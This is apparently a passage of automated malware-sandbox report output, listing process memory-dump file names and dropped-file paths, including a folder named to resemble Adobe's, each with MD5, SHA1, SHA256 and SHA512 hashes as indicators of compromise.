memory/904-63-0x0000000002AD0000-0x0000000002CDC000-memory.dmp
memory/904-70-0x0000000000400000-0x0000000000709000-memory.dmp
memory/904-71-0x0000000000400000-0x0000000000709000-memory.dmp
memory/904-72-0x0000000000400000-0x0000000000709000-memory.dmp
memory/904-73-0x0000000000400000-0x0000000000709000-memory.dmp
memory/904-74-0x0000000002AD0000-0x0000000002CDC000-memory.dmp
memory/904-80-0x0000000002AD0000-0x0000000002CDC000-memory.dmp
memory/904-85-0x0000000002AD0000-0x0000000002CDC000-memory.dmp
memory/4032-86-0x0000000000400000-0x0000000000709000-memory.dmp
memory/2040-90-0x0000000000400000-0x000000000070C000-memory.dmp
memory/4504-94-0x0000000000400000-0x000000000070C000-memory.dmp
memory/4504-96-0x0000000002A50000-0x0000000002C5C000-memory.dmp
memory/4504-100-0x0000000002A50000-0x0000000002C5C000-memory.dmp
C:\ProgramData\TEMP\RAIDTest
| MD5 | c2f09542b6c7daf4288f3524c8cebb18 |
| SHA1 | 9430b21baf07f0d105b9ee5fdd9f868418454517 |
| SHA256 | 55d7808233c58f1606fff77eb382a02ed729bf5d8b2640fb313d0f7c91e970d4 |
| SHA512 | dcc19cfbc78b78708ce2586228424194f846d80b6d072045baaf93559d20f71e809a4eb57e7dac3b4ea109d90aeb585d0b5438dc1dd7d34054c03aa6350d6672 |
C:\ProgramData\TEMP:663565B1
| MD5 | d504b2b6bffa48fc5c7a07ba9a86243d |
| SHA1 | 869e88950fa6a28379493a31982d73bacc154898 |
| SHA256 | 3db629b989735cf189b5b60acb57fb355f0a9b0ae348a514c85934274acc2463 |
| SHA512 | 08ee63d2462ad3f4239e20af4c815ace67dec8302d170def0e1a671b758f28cbff6a5c1758d9792030546dfd5d07e60821d295a37a9b3263b5c3af0a458867c4 |
C:\ProgramData\Licenses\086A4C8982A52E70F.Lic
| MD5 | 1ea025efbb8f8a83b58bf7d8c112e9fc |
| SHA1 | c80159a063f58672933a04e44a4fde78badfd6e3 |
| SHA256 | 63c99490e9d7a0e7b2d7746ebbbcf2e39816ce979b31b0c90969eed58aff2b0e |
| SHA512 | 7aee4cfcf3a9eba23076feb73bf04af88d8de25565d4578b96608232cf63fd0df65a85a3ccd349b5622e7a5e6151cd727004073277a74b11f3bfc335cad14830 |
memory/4504-110-0x0000000000400000-0x000000000070C000-memory.dmp
memory/4504-109-0x0000000000400000-0x000000000070C000-memory.dmp
memory/4504-111-0x0000000000400000-0x000000000070C000-memory.dmp
memory/4504-113-0x0000000002A50000-0x0000000002C5C000-memory.dmp
memory/4504-112-0x0000000000400000-0x000000000070C000-memory.dmp
memory/2040-120-0x0000000000400000-0x000000000070C000-memory.dmp
memory/4504-119-0x0000000002A50000-0x0000000002C5C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\112.112
| MD5 | 3c305699054489d4ba953729549294b8 |
| SHA1 | 272b920622013b83dc073c26b75f5968663496c5 |
| SHA256 | 52392e1693a81b409ab85297d0dc90dd360b0fd3ba022341499ab3f23add16d8 |
| SHA512 | 7051b5a88aa709cf6496bddd82c91cc8d198390825c202ec34d1295e1070e62cf92566390dbd083b091a7c83d539d17751790e9cba569f4f566cd90de488000b |
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\011.011
| MD5 | e682489861311d7a3b12b0d35277228a |
| SHA1 | 1a5df66e396baf79b774bf77ca3b2e1031265b5d |
| SHA256 | d80049f614db418114857762291924ef7dc627991f13373bfbad42b37e78bec4 |
| SHA512 | efad32f3717a31ad26516b04f63ce73d1b6b86fdfedc402ddd436603fba4482c41643f9933a412f461328c044e8e0bc45aa5836e69766b8e97d059c6db1cef4e |